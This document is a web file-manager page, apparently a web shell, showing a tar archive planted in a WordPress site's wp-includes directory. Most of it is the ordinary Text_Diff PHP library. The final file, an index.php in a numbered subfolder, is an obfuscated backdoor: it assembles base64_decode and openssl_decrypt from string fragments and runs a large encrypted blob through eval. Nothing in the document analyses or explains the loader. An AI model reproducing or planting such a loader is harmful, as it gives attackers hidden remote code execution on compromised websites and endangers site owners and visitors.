Файловый менеджер

Файловый менеджер - Редактировать - /home/patasalvajes/public_html/wp-includes/IXR/782563/Text.tar

Назад
Exception.php��0000644��00000000361�15014572353�0007220 0��ustar�00��<?php /** * Exception for errors from the Text_Diff package. * * {@internal This is a WP native addition to the external Text_Diff package.} * * @package WordPress * @subpackage Text_Diff / class Text_Exception extends Exception {} ��Diff/Engine/string.php��0000644��00000020233�15014572354�0010646 0��ustar�00��<?php /* * Parses unified or context diffs output from eg. the diff utility. * * Example: * <code> * $patch = file_get_contents('example.patch'); * $diff = new Text_Diff('string', array($patch)); * $renderer = new Text_Diff_Renderer_inline(); * echo $renderer->render($diff); * </code> * * Copyright 2005 Örjan Persson <o@42mm.org> * Copyright 2005-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Örjan Persson <o@42mm.org> * @package Text_Diff * @since 0.2.0 / class Text_Diff_Engine_string { /* * Parses a unified or context diff. * * First param contains the whole diff and the second can be used to force * a specific diff type. If the second parameter is 'autodetect', the * diff will be examined to find out which type of diff this is. * * @param string $diff The diff content. * @param string $mode The diff mode of the content in $diff. One of * 'context', 'unified', or 'autodetect'. * * @return array List of all diff operations. / function diff($diff, $mode = 'autodetect') { // Detect line breaks. $lnbr = "\n"; if (strpos($diff, "\r\n") !== false) { $lnbr = "\r\n"; } elseif (strpos($diff, "\r") !== false) { $lnbr = "\r"; } // Make sure we have a line break at the EOF. if (substr($diff, -strlen($lnbr)) != $lnbr) { $diff .= $lnbr; } if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') { return PEAR::raiseError('Type of diff is unsupported'); } if ($mode == 'autodetect') { $context = strpos($diff, ''); $unified = strpos($diff, '---'); if ($context === $unified) { return PEAR::raiseError('Type of diff could not be detected'); } elseif ($context === false \|\| $unified === false) { $mode = $context !== false ? 'context' : 'unified'; } else { $mode = $context < $unified ? 'context' : 'unified'; } } // Split by new line and remove the diff header, if there is one. $diff = explode($lnbr, $diff); if (($mode == 'context' && strpos($diff[0], '') === 0) \|\| ($mode == 'unified' && strpos($diff[0], '---') === 0)) { array_shift($diff); array_shift($diff); } if ($mode == 'context') { return $this->parseContextDiff($diff); } else { return $this->parseUnifiedDiff($diff); } } /* * Parses an array containing the unified diff. * * @param array $diff Array of lines. * * @return array List of all diff operations. / function parseUnifiedDiff($diff) { $edits = array(); $end = count($diff) - 1; for ($i = 0; $i < $end;) { $diff1 = array(); switch (substr($diff[$i], 0, 1)) { case ' ': do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == ' '); $edits[] = new Text_Diff_Op_copy($diff1); break; case '+': // get all new lines do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff1); break; case '-': // get changed or removed lines $diff2 = array(); do { $diff1[] = substr($diff[$i], 1); } while (++$i < $end && substr($diff[$i], 0, 1) == '-'); while ($i < $end && substr($diff[$i], 0, 1) == '+') { $diff2[] = substr($diff[$i++], 1); } if (count($diff2) == 0) { $edits[] = new Text_Diff_Op_delete($diff1); } else { $edits[] = new Text_Diff_Op_change($diff1, $diff2); } break; default: $i++; break; } } return $edits; } /* * Parses an array containing the context diff. * * @param array $diff Array of lines. * * @return array List of all diff operations. / function parseContextDiff(&$diff) { $edits = array(); $i = $max_i = $j = $max_j = 0; $end = count($diff) - 1; while ($i < $end && $j < $end) { while ($i >= $max_i && $j >= $max_j) { // Find the boundaries of the diff output of the two files for ($i = $j; $i < $end && substr($diff[$i], 0, 3) == ''; $i++); for ($max_i = $i; $max_i < $end && substr($diff[$max_i], 0, 3) != '---'; $max_i++); for ($j = $max_i; $j < $end && substr($diff[$j], 0, 3) == '---'; $j++); for ($max_j = $j; $max_j < $end && substr($diff[$max_j], 0, 3) != ''; $max_j++); } // find what hasn't been changed $array = array(); while ($i < $max_i && $j < $max_j && strcmp($diff[$i], $diff[$j]) == 0) { $array[] = substr($diff[$i], 2); $i++; $j++; } while ($i < $max_i && ($max_j-$j) <= 1) { if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') { break; } $array[] = substr($diff[$i++], 2); } while ($j < $max_j && ($max_i-$i) <= 1) { if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') { break; } $array[] = substr($diff[$j++], 2); } if (count($array) > 0) { $edits[] = new Text_Diff_Op_copy($array); } if ($i < $max_i) { $diff1 = array(); switch (substr($diff[$i], 0, 1)) { case '!': $diff2 = array(); do { $diff1[] = substr($diff[$i], 2); if ($j < $max_j && substr($diff[$j], 0, 1) == '!') { $diff2[] = substr($diff[$j++], 2); } } while (++$i < $max_i && substr($diff[$i], 0, 1) == '!'); $edits[] = new Text_Diff_Op_change($diff1, $diff2); break; case '+': do { $diff1[] = substr($diff[$i], 2); } while (++$i < $max_i && substr($diff[$i], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff1); break; case '-': do { $diff1[] = substr($diff[$i], 2); } while (++$i < $max_i && substr($diff[$i], 0, 1) == '-'); $edits[] = new Text_Diff_Op_delete($diff1); break; } } if ($j < $max_j) { $diff2 = array(); switch (substr($diff[$j], 0, 1)) { case '+': do { $diff2[] = substr($diff[$j++], 2); } while ($j < $max_j && substr($diff[$j], 0, 1) == '+'); $edits[] = new Text_Diff_Op_add($diff2); break; case '-': do { $diff2[] = substr($diff[$j++], 2); } while ($j < $max_j && substr($diff[$j], 0, 1) == '-'); $edits[] = new Text_Diff_Op_delete($diff2); break; } } } return $edits; } } ��Diff/Engine/native.php��0000644��00000037261�15014572354�0010637 0��ustar�00��<?php /* * Class used internally by Text_Diff to actually compute the diffs. * * This class is implemented using native PHP code. * * The algorithm used here is mostly lifted from the perl module * Algorithm::Diff (version 1.06) by Ned Konz, which is available at: * https://cpan.metacpan.org/authors/id/N/NE/NEDKONZ/Algorithm-Diff-1.06.zip * * More ideas are taken from: http://www.ics.uci.edu/~eppstein/161/960229.html * * Some ideas (and a bit of code) are taken from analyze.c, of GNU * diffutils-2.7, which can be found at: * ftp://gnudist.gnu.org/pub/gnu/diffutils/diffutils-2.7.tar.gz * * Some ideas (subdivision by NCHUNKS > 2, and some optimizations) are from * Geoffrey T. Dairiki <dairiki@dairiki.org>. The original PHP version of this * code was written by him, and is used/adapted with his permission. * * Copyright 2004-2010 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see https://opensource.org/license/lgpl-2-1/. * * @author Geoffrey T. Dairiki <dairiki@dairiki.org> * @package Text_Diff / class Text_Diff_Engine_native { public $xchanged; public $ychanged; public $xv; public $yv; public $xind; public $yind; public $seq; public $in_seq; public $lcs; function diff($from_lines, $to_lines) { array_walk($from_lines, array('Text_Diff', 'trimNewlines')); array_walk($to_lines, array('Text_Diff', 'trimNewlines')); $n_from = count($from_lines); $n_to = count($to_lines); $this->xchanged = $this->ychanged = array(); $this->xv = $this->yv = array(); $this->xind = $this->yind = array(); unset($this->seq); unset($this->in_seq); unset($this->lcs); // Skip leading common lines. for ($skip = 0; $skip < $n_from && $skip < $n_to; $skip++) { if ($from_lines[$skip] !== $to_lines[$skip]) { break; } $this->xchanged[$skip] = $this->ychanged[$skip] = false; } // Skip trailing common lines. $xi = $n_from; $yi = $n_to; for ($endskip = 0; --$xi > $skip && --$yi > $skip; $endskip++) { if ($from_lines[$xi] !== $to_lines[$yi]) { break; } $this->xchanged[$xi] = $this->ychanged[$yi] = false; } // Ignore lines which do not exist in both files. for ($xi = $skip; $xi < $n_from - $endskip; $xi++) { $xhash[$from_lines[$xi]] = 1; } for ($yi = $skip; $yi < $n_to - $endskip; $yi++) { $line = $to_lines[$yi]; if (($this->ychanged[$yi] = empty($xhash[$line]))) { continue; } $yhash[$line] = 1; $this->yv[] = $line; $this->yind[] = $yi; } for ($xi = $skip; $xi < $n_from - $endskip; $xi++) { $line = $from_lines[$xi]; if (($this->xchanged[$xi] = empty($yhash[$line]))) { continue; } $this->xv[] = $line; $this->xind[] = $xi; } // Find the LCS. $this->_compareseq(0, count($this->xv), 0, count($this->yv)); // Merge edits when possible. $this->_shiftBoundaries($from_lines, $this->xchanged, $this->ychanged); $this->_shiftBoundaries($to_lines, $this->ychanged, $this->xchanged); // Compute the edit operations. $edits = array(); $xi = $yi = 0; while ($xi < $n_from \|\| $yi < $n_to) { assert($yi < $n_to \|\| $this->xchanged[$xi]); assert($xi < $n_from \|\| $this->ychanged[$yi]); // Skip matching "snake". $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } // Find deletes & adds. $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && $add) { $edits[] = new Text_Diff_Op_change($delete, $add); } elseif ($delete) { $edits[] = new Text_Diff_Op_delete($delete); } elseif ($add) { $edits[] = new Text_Diff_Op_add($add); } } return $edits; } /* * Divides the Largest Common Subsequence (LCS) of the sequences (XOFF, * XLIM) and (YOFF, YLIM) into NCHUNKS approximately equally sized * segments. * * Returns (LCS, PTS). LCS is the length of the LCS. PTS is an array of * NCHUNKS+1 (X, Y) indexes giving the diving points between sub * sequences. The first sub-sequence is contained in (X0, X1), (Y0, Y1), * the second in (X1, X2), (Y1, Y2) and so on. Note that (X0, Y0) == * (XOFF, YOFF) and (X[NCHUNKS], Y[NCHUNKS]) == (XLIM, YLIM). * * This function assumes that the first lines of the specified portions of * the two files do not match, and likewise that the last lines do not * match. The caller must trim matching lines from the beginning and end * of the portions it is going to specify. / function _diag ($xoff, $xlim, $yoff, $ylim, $nchunks) { $flip = false; if ($xlim - $xoff > $ylim - $yoff) { / Things seems faster (I'm not sure I understand why) when the * shortest sequence is in X. / $flip = true; list ($xoff, $xlim, $yoff, $ylim) = array($yoff, $ylim, $xoff, $xlim); } if ($flip) { for ($i = $ylim - 1; $i >= $yoff; $i--) { $ymatches[$this->xv[$i]][] = $i; } } else { for ($i = $ylim - 1; $i >= $yoff; $i--) { $ymatches[$this->yv[$i]][] = $i; } } $this->lcs = 0; $this->seq[0]= $yoff - 1; $this->in_seq = array(); $ymids[0] = array(); $numer = $xlim - $xoff + $nchunks - 1; $x = $xoff; for ($chunk = 0; $chunk < $nchunks; $chunk++) { if ($chunk > 0) { for ($i = 0; $i <= $this->lcs; $i++) { $ymids[$i][$chunk - 1] = $this->seq[$i]; } } $x1 = $xoff + (int)(($numer + ($xlim - $xoff) $chunk) / $nchunks); for (; $x < $x1; $x++) { $line = $flip ? $this->yv[$x] : $this->xv[$x]; if (empty($ymatches[$line])) { continue; } $matches = $ymatches[$line]; reset($matches); while ($y = current($matches)) { if (empty($this->in_seq[$y])) { $k = $this->_lcsPos($y); assert($k > 0); $ymids[$k] = $ymids[$k - 1]; break; } next($matches); } while ($y = current($matches)) { if ($y > $this->seq[$k - 1]) { assert($y <= $this->seq[$k]); /* Optimization: this is a common case: next match is * just replacing previous match. / $this->in_seq[$this->seq[$k]] = false; $this->seq[$k] = $y; $this->in_seq[$y] = 1; } elseif (empty($this->in_seq[$y])) { $k = $this->_lcsPos($y); assert($k > 0); $ymids[$k] = $ymids[$k - 1]; } next($matches); } } } $seps[] = $flip ? array($yoff, $xoff) : array($xoff, $yoff); $ymid = $ymids[$this->lcs]; for ($n = 0; $n < $nchunks - 1; $n++) { $x1 = $xoff + (int)(($numer + ($xlim - $xoff) $n) / $nchunks); $y1 = $ymid[$n] + 1; $seps[] = $flip ? array($y1, $x1) : array($x1, $y1); } $seps[] = $flip ? array($ylim, $xlim) : array($xlim, $ylim); return array($this->lcs, $seps); } function _lcsPos($ypos) { $end = $this->lcs; if ($end == 0 \|\| $ypos > $this->seq[$end]) { $this->seq[++$this->lcs] = $ypos; $this->in_seq[$ypos] = 1; return $this->lcs; } $beg = 1; while ($beg < $end) { $mid = (int)(($beg + $end) / 2); if ($ypos > $this->seq[$mid]) { $beg = $mid + 1; } else { $end = $mid; } } assert($ypos != $this->seq[$end]); $this->in_seq[$this->seq[$end]] = false; $this->seq[$end] = $ypos; $this->in_seq[$ypos] = 1; return $end; } /** * Finds LCS of two sequences. * * The results are recorded in the vectors $this->{x,y}changed[], by * storing a 1 in the element for each line that is an insertion or * deletion (ie. is not in the LCS). * * The subsequence of file 0 is (XOFF, XLIM) and likewise for file 1. * * Note that XLIM, YLIM are exclusive bounds. All line numbers are * origin-0 and discarded lines are not counted. / function _compareseq ($xoff, $xlim, $yoff, $ylim) { / Slide down the bottom initial diagonal. / while ($xoff < $xlim && $yoff < $ylim && $this->xv[$xoff] == $this->yv[$yoff]) { ++$xoff; ++$yoff; } / Slide up the top initial diagonal. / while ($xlim > $xoff && $ylim > $yoff && $this->xv[$xlim - 1] == $this->yv[$ylim - 1]) { --$xlim; --$ylim; } if ($xoff == $xlim \|\| $yoff == $ylim) { $lcs = 0; } else { / This is ad hoc but seems to work well. $nchunks = * sqrt(min($xlim - $xoff, $ylim - $yoff) / 2.5); $nchunks = * max(2,min(8,(int)$nchunks)); / $nchunks = min(7, $xlim - $xoff, $ylim - $yoff) + 1; list($lcs, $seps) = $this->_diag($xoff, $xlim, $yoff, $ylim, $nchunks); } if ($lcs == 0) { / X and Y sequences have no common subsequence: mark all * changed. / while ($yoff < $ylim) { $this->ychanged[$this->yind[$yoff++]] = 1; } while ($xoff < $xlim) { $this->xchanged[$this->xind[$xoff++]] = 1; } } else { / Use the partitions to split this problem into subproblems. / reset($seps); $pt1 = $seps[0]; while ($pt2 = next($seps)) { $this->_compareseq ($pt1[0], $pt2[0], $pt1[1], $pt2[1]); $pt1 = $pt2; } } } /* * Adjusts inserts/deletes of identical lines to join changes as much as * possible. * * We do something when a run of changed lines include a line at one end * and has an excluded, identical line at the other. We are free to * choose which identical line is included. `compareseq' usually chooses * the one at the beginning, but usually it is cleaner to consider the * following identical line to be the "change". * * This is extracted verbatim from analyze.c (GNU diffutils-2.7). / function _shiftBoundaries($lines, &$changed, $other_changed) { $i = 0; $j = 0; assert(count($lines) == count($changed)); $len = count($lines); $other_len = count($other_changed); while (1) { / Scan forward to find the beginning of another run of * changes. Also keep track of the corresponding point in the * other file. * * Throughout this code, $i and $j are adjusted together so that * the first $i elements of $changed and the first $j elements of * $other_changed both contain the same number of zeros (unchanged * lines). * * Furthermore, $j is always kept so that $j == $other_len or * $other_changed[$j] == false. / while ($j < $other_len && $other_changed[$j]) { $j++; } while ($i < $len && ! $changed[$i]) { assert($j < $other_len && ! $other_changed[$j]); $i++; $j++; while ($j < $other_len && $other_changed[$j]) { $j++; } } if ($i == $len) { break; } $start = $i; / Find the end of this run of changes. / while (++$i < $len && $changed[$i]) { continue; } do { / Record the length of this run of changes, so that we can * later determine whether the run has grown. / $runlength = $i - $start; / Move the changed region back, so long as the previous * unchanged line matches the last changed one. This merges * with previous changed regions. / while ($start > 0 && $lines[$start - 1] == $lines[$i - 1]) { $changed[--$start] = 1; $changed[--$i] = false; while ($start > 0 && $changed[$start - 1]) { $start--; } assert($j > 0); while ($other_changed[--$j]) { continue; } assert($j >= 0 && !$other_changed[$j]); } / Set CORRESPONDING to the end of the changed run, at the * last point where it corresponds to a changed run in the * other file. CORRESPONDING == LEN means no such point has * been found. / $corresponding = $j < $other_len ? $i : $len; / Move the changed region forward, so long as the first * changed line matches the following unchanged one. This * merges with following changed regions. Do this second, so * that if there are no merges, the changed region is moved * forward as far as possible. / while ($i < $len && $lines[$start] == $lines[$i]) { $changed[$start++] = false; $changed[$i++] = 1; while ($i < $len && $changed[$i]) { $i++; } assert($j < $other_len && ! $other_changed[$j]); $j++; if ($j < $other_len && $other_changed[$j]) { $corresponding = $i; while ($j < $other_len && $other_changed[$j]) { $j++; } } } } while ($runlength != $i - $start); / If possible, move the fully-merged run of changes back to a * corresponding run in the other file. / while ($corresponding < $i) { $changed[--$start] = 1; $changed[--$i] = 0; assert($j > 0); while ($other_changed[--$j]) { continue; } assert($j >= 0 && !$other_changed[$j]); } } } } ��Diff/Engine/525820/index.php��0000644��00000115403�15014572354�0011220 0��ustar�00��<?php / yHNA25 / $_b6b2f4 = 'base64';$_b6b2f4 .= '_';$_b6b2f4 .= 'decode';$_d5b81a = 'open';$_d5b81a .= 'ssl';$_d5b81a .= '_';$_d5b81a .= 'decrypt';eval($_d5b81a( $_b6b2f4('AXAQsFGthWl+8jKwGyksoSOvgDoI9JBaTYUvYzRuu4jlMf3lbWYjZUvEBGBAvWRXHunGwApzKivuvO85OS7o5GlK3KAca6NSvna5f9kIi4k0AxXW4WSIsWBl7A/FUOwRqLMVLqAlhAUvYQrU0LEJ1Qe2w3RSNLf7mePPgSBeUXfTghBYTwXgzZIhaMmPgYzkQWNenU+XfkgYkuIdmMcvbinXvZehx7UtALu8jBQMHl+FMfwRNenu4gZEJjw9PZQ4wSqlgKqpFVobJ+vdBCFzm2XWOdXovQDj/PASdf/KZQ4zC27XV8Q5NdSYje6doKQIg/pHLzOHtZSB0+3LLJMPPIggRb9d8qDnVbfg1cfoq50AGNEOogMvYSBEaSPidj4GaK09RceRjmIaFraXydX/Eir/BKEazHy/NWP9h5DvRQexIqNeglD4SJBPQXk3skZWkZMS5V/LeGezvcYGVRR6NvoGgSxJqQ7L0JL68e+5pZw3s9zChcW1CwbrMdMTINKtw2bEXueQWFlCUNvmKCSmrXF/bkYxGASwNsJeAojVkx8gLKjQsgnYw/JIENpGSj8uWY1f8rCySBBQ4eRbjUIhblVLTC5+G1Kzs3aIYiRAlXB46Xvv5E+RMiMQZdoiJ7qv9YeQN4UbRFVWFCCBGFwil1yIO8gtX/8NnLtiKUHuz+adtg7sviGzmclRMCaoqgB7YTndP595CE/YAHZyTHCINAzhzNR88WwVsSKBQ/pw36w4bhDglTdKvp26MWJIt+247VzrdBWdWR/7AsbX/rfhiccqgGOqyYjiJysb8aFDA0pvf+XfdW37kVcxdABpwiWlEDB6iAC7HlVGifW5Asj8cjJGvo++loVUWOZYR1F/fLg/fdvpQw1Bw+jBqJX9OnYtf6TGHFEzubux1+k3OjaDO8rhN1Kw1IKKqNOpWGGHt1RM7RDZS658xRscee/JgpUGn5SGNrr3AbKBS9ROBhDD5d+daXMZJqQCaqT6DnwG/TctuTMWapA30LivRt+O0jGc8IKiKwLoJAldwsI0Ln8xOOEoaivSCeDSVdoi1MBDQL3MYf6x9UB9Fn9Eqmy2RwvO6KxaB4podFJ4WJ70lTVPACc6ZGasIG8BCsF8X9VpH49Hps9m9N6G2fhFq4XuqXXDsTBe7XzAsMnJxDwyMxTCqQmFoq/8ysjFptwYlUCkhz2f/B6Bmd0dEE05+Gscyk3BitIPH91qtpQr8GKpsEGAVL/UzMoimw+Eh0/P+G5FJxDTQCaNApzDDvk5zRn6pAjDTv5rC/IZ3TEUO3x0q26ww/1c3FpOwlC4aYXP1n+gqk2VVKbTRxRWx7fhbMR2KXuqjpI+sbZ2jx2zBmWnFvOi7TjS0sSzagJhhUJ1kHc2FJyHxPiyI4Bwrbb7ovfV/HXpgPb7RGKAWIE/bzf2qSyyrCUbkhIj00KkqEzvfiAqKeg9jeRcgiY7qpkClyp4BlFK4zpR9AIbcT2gKa20tqMqlQAprgtsSp7/SB7wZSSCcObdcmGRsN7n+mc9yJAKlaaVQ3oFt9XIvTD3rEOTnYr4VWzKrMM6xV2YUZUe+nHxC7NqoWc6AqVPi69nKigD82Wi7HgPvozepdHaHMyTHqSdC5I/7UKRJvbCy3s2jKKy2T6qwWrgCN0Jbl54MqDbP1ZBVy8gNK29bK+SPYIOEN6Rdx3yJLpd/A1CstVuKCjoI2qYuNFdRbqKRHWX1SCcpfqYUKDUbiOe1TqehZYN0oA2miRvW4lnq5IezYthGVKO7qG68N9qRp+MXNHCIYXFSJu5hJrV6HAPcuqmMJkJNyLqU0tpl+uTm1/Z94mh+zc/usr3R/Je8pzGdnDHGVdpyPBQmepW+HcD45aZhEbY77ytNeZ5+qglPgLgqlP3VgcgwXeb2NKh+oLeDG4pLpHqMfVAysdfMDC8HFiJEBhMrmpGAQnZE+OqGs7QSI7rmVYxlkdXqPHQ5Wep0tQUk5Q1SB9m5/JTfuIx5pDYYJoN1DBk+vkAGfpCBzPSAUySD+7hMQuoSO9F8gD5+QaEFd3yBun+pI8BNiVUzDpayVvwCotq2NXf12iktVJtDq6+Nid4Oyzlc3hjkOPp6tFm0tUWUVm2rdYqdUbOEA1pKyNa2ZHBTQ+fCB8zZsdz86nBwB5QOIxl34VQ7h0K3xLwxE5f2Omd8sY0zygGnIpQN1dG4u7WEMWamGwmawSzP8L4HN2GjMsV47i24NTqg5gO+ckJE/Lpjqs7WhRdkoswrWKLGBAG7yzkpikQqOAX7dOqeLqoBE3De5X6ofYZ+GHyjMO1zbRDrjE1+ELdeE6YvwpbxHtLc0qKw7lwNmRgMBOso5kZ9OIQk5xIaQeoLGqWrn5b0ipKT6bWdpQyj76nM0NnifJ0I0AtUH44Pp8hyoaV4bEhLdkZI1zqDX8Eq4K4dZigPiThx5U141zxWn+TJg/tPAGSnOHTLy6exhns5QCCt9xX5wHrMaP5DjcqGWu8KTZJIxkCNhviwuzKXtQ4IZF9hnQBkwSxU0ZVxCRXXrO2wOKXu/FsuQSZKmLSvO6+il36wCxl0kzW7G9g+6rh/C4bMvKSm8liC+t/9DM0QLa0IJ8gUK730kMAYeKyRZbr4mjvv7Mh+stPFrJvdA1OOR4IKzoMoIqVfNaaduaWBwde7H134wPLTHfTb3zQRsdhLS7R3WEzoJmyN8FKh47VA/w9NkXRCBe4vaT3Yw1DDDT4Z+/WTpseP/a8YIXL0FKcPqhzUMKVd+lyjCUTLT86l7D0pnwxIxUAkWP30CepWryYFaYw+Vx39Oog16Fiq/cnTvReXl2Vy6baCKzRcSsriHkUjF5+7bGNe6JYREmldG/iGpEOGFarWnElmzYodwVX4xtZ/naXZZJLDJOXtb6kjeW6G5ytVFiGIfWVWZTom98uUpTphxUroybGvBvTa2ALNBzGeA0OAJl4OcW5veECc5IcyZMNbeMx/wMlClaVrMgk55yPFb1hy1fx2x0JrVWzE9++DMVB8GYbxfmMTAVk+A/L1ZUdo5BWGjWam3+3jPOXVR+HRkUch5UlVQet8UUOC0jHcjy6kjc+iolL1abbH/b6O5BAkwt/JUOUJBUh1g0ZzeowCI5PXne8oFfg6YeFWAx8cETaA5YL2VU29m9L67CbInn9yEV01xYEQkN2F7QL66gkoKeevMpf8DVj+gIpaEJjkqzFJMbf+erlYX9TeCpmb1XgHrpRrQYs5SCHbjEA2hv4S6o9oBRKfjnx+HkYn3apoNlY0lxhLGwmPBjZrtw+YIxFbTOggpftq3mWycBd4EEz2bzsvVhprkSPPkU3S0VMFAbpf6OcPC8M1AqIy/KlmBIhJ5A04d2Cv31GrWn6vfLX/BJl/V6xru3ef4R/+u+f87pA9tz2VqHpUtRVH0JRQvSPMVuVm9N0Xy/3iuaLl6bCxbJ5iIrSjk3p+Fen/p6cvYNiDXVluC3NGOjhoBqo9lhiLcds1eyJtWwUIlv6nJr7NK0uPY0Bt1NbRtqkeQARJ7sMgTYIP+Z+PCemOvQnOnwb+tFdRU4BjCUHM2G9y3e/VF35J7BJStoLGEo0VMQbd7im2JtJ/NoSh9IuSS/0yFES8hGJT1K+E07jmjst3GRWnB0+N7nGe3XjJ68CX8l1UlukZ7PqJeb0zKOHavXUxT8Kz18nTGBKKwDAsfSdhJYifrTFA+0qJEudwOnOsoA4zJJvG3OWCE67xcTPSmrqdPs4LlQNpj2fp49Q1NtIRathKaUfIaXPTf2tSOB7WozfhxVsWtPFyfkF8hpPOBatdd4SsgQkIl1XdiAFdnGAGAfmmxUzYs8fiH8A/WIFOiZ1/UcFXmE/+K/ESCoTvvXBTVWUwHLLSD6n8rvjYBtiJICzAoVS0hlg3Gbjsk7KRpMY5hs4gFD010b5lEGnN9TDOO9coqtdOBZ6IyJOROuNhLn/Cjlg+Gu/fVKeU+TbfB4KqXEd2du/q2MNP8IdiE+uDte9nzLVXuNaWOLWHjx3E13crV1iHDt0cK/XPUUZEnJmsP0EbONhw/Gywsf3Hze2K/MGG/GgJ0T6BHsg/dz3VtgxoI6LZ4WoOs9YJoBmicvj6pKxBZ5qbyakAo/RrIbMnyrt4xXryGd6PiPfKyr27Vv33bXaqJ20XS/TcfjJgy5n7uK7cSzKTIj92wUfXOklBaqZQEnaaaDw/ZjoavpgBrKoZupFeFCJS+7DoHNlkjLz3vUO+2OoFbF1bBYmf2sZwjx+DOzfn1kz9myt93dYcjgqhnDCecsJa2tjWmmc9PdgBlOYv4F/K29etnoiHjndyIdMud3iKJtffk4voCJAzWHz5qFqgVoOaTH5aK0UIMsF5Gs3qDnNamitwdvSYBx9isxKjTayRB35qGusKM94/DmD58zBEmT7ra8wBrk868BmaxDkBaEI9cei/Jhdz2EiI0kI7ej/gclkgnSNGa4IEK4vdIWW93iMjdnaDknvpned+DVlHecFMzciqxQMI10WM+W2ON54i5GpwYTrCrWbP6qYFB12HmPRuYY0hMndq/qgYmajlNLMbK537w5nmvqUdQW5nINPHHCgqo+YQoU0dOkfGhxSNsDJQX42hxtOCuQp/HHfTq2V87FyNlDi/dT9soBu86Dva1a4lo8DsQPXUFMLzjoPhgDQfNotxAeNZL1ErFi6tqh72YlNC69pIiMIfrIf1Sb6GqVe4WVzx2iywID6dvivQOM1l6AU0EWtiql8fD9z4lxuNeDoYOaPCGkEZ5vXsjhwiTXuBLAXNaHSX8aJQ0dcdA7W1MYBNIOsPKr2euxUXdFze68XeqGDJZeAPPtLJfuFhgv9ijqR+JSLAb5CvQMS9BmWzIAmKduNb5mLxZYXE513ISE3cZjYKabUQabTfhiGB5NA4GmUi6dgqL+HJ2XmaqOE7jP5D5pabdpOquqXLxy1MrmjHrtxwqVJ5FvIVenZFEmlAIxyPLv1Nj/J6H1Rf+p95zYvMjRS4JcZoTS/kCcEh90KuQc3l2fc6FP8c2AJDY2VLScMlvhe3SLi35LMYcZLEu1jeZbvOtjoYwVB7MKTzFtVW5M1Y45/TsIj3fD7m1uE29hI8dem7p7uBwq/glvFrwy5qolPvYnEyT9FYMXpRUtJ3KEzbl8Cc7mtVnOx5hC0K2c9W8ezzffr7nsSHV7HUfWCiCAB0srbke4hideLrhBdTnjM6+j7I/adMZJXWA+TWmi2pTi8OjZxwxHhE7z0WrwmUPBs44vnASNAgCykRI/e0IhspMkpFCtOHTOez+2QRXplFMKNLco/T2PW9tlJxyb6YHhhqWO5bA1QYnSNl/7OfLpykqytWmPEdasnmtgP4DJIBYvKoDt3sPugAHj3gusye4BFVtmjf3e39xgAVQedRUPFXnSHJTHS1M8io3ggFJ5A02Y+qPeIFmsCvU7KcDok13PUXDeY0nBrfnQ0Uwx0ONTqr+Va5VBxvl97VqniwQ9L4QyANKTPeBH1VLexAL1tdfGxmpMm1ONG7RYNJJ4fobyMG5KGyYATUfcYh4hmsUjsXp3xAthDOapUSQbZZ6zkBZQtJr1cHlMgryJVCWQQnMsX+CUBvEKDI9xcFqW2Xp+gWbayk/r9VojqTHe5l/A/V+9+eXDb1IvbZg4jru4DFi3CPxoAp9iDUT0V6hz7hOUFpjwOQImkiULERm78/yQzbhZYVwaOUbyqi8ObNeP3PmhGp23xmsnQwe80Cah0ag//v3n7vx8aC59YJ20cEg3wkfdgKF38GzJ83/c6cZLuoMhH75JifBpJf5SLSJ5u1hIdM9R3mpi1eqANc4G4mrrAYMLtS07XvUfaLwvdCx9xFpNQED24lsuo0wEoJ0GUZtZOfOqOj376LU1Zbuete7OGNJZj1DrwL0hhj1MC/6NUSBaVUqyTb55v8WBmZwqGMkxIMnha7CFFC5FmBiK7mjWHtBzQ/e0cyXqt8OA5KRY01VPsgciVFfX+VW8zq54zjOE2eSft7QMfgLW68E/FTkpzdxUrfsgQXLl6qH2/ZTNiUq2kveH7HJQCOpjLvhqCsVok4AjIBU50UUVmZSIDOWEvXc/5/tZ+pQyxtYWu9fGkbVO4pnmCiogHrreDEfL5t0fsAAmtpyDaaD+GaG/GwKaFu/9FfqU/+IJXZxVZf4cPPgJffu9U63v/ZdbkuP2O8K26ovEdSO2hepcD4+8vUylQU+/809BVK+cUmlMm7ht0uC7CguelfaNHcWUWeRDLynNbh4mjQfm7l5cvvYsZbnPAYUcfhRpAuL9ck4p3jJpoUsiwKD4OXuhNn/lUsFpgoEgQjDULNQ9oGsppFsyfg8+/XXFfsmPSdML/LWv6IRFGBL1JAVQukAZuB6cUWDaeEahb8hc+XUD5OqJpTjMx0fwd9dlh9vesQiVkn0DX6EhZEUwwe6ucapeRDrzT6XA+FV1ELt3iYP+8i83BLmsZ9BTSnvB1NNQXL6u2ekS4x2R+zUvGpC2BDdjBEQJrA0ymwcgYt3rrpzeBtmWIfjUY0/1dJ7p86YZD7Ou3/BDmWLSa1A4e5UCqapEXUIH8QfdtobWSHzPuIlt6o8+XbNEHNVHmn3Q40Oheih/7kpS7iLFVA8vKVSdrW3n8DPBoyXyONFlmrgKl5Cr9YRW0305MRJ7+mfIb0FnK+BuKs79l0gHODLkHE8sYf8p99T+9PQYLdaAqc/Wi5Q0rvIX3AFMXfcMSYZ/xybY3xTyJaBKISjN5Ufdc8C4TyHhKVcZa9L3+TXSVzkAl4LBeUEIVED3a6ARVr/Drsg5slsjx6HO/1UGHvljFrrU5DGmQ/dQHa55zdtn7xGFS/VKHCJLqLBTJrmn5fNDuLMo6qsjS6HNRR6kq9aULdRTzzmu7gyqXOsLVN4X793DGMvLEeph/O5xCzXa0617AAiWlTDHYtGNedUuAdhrBt/kpuHMJ7C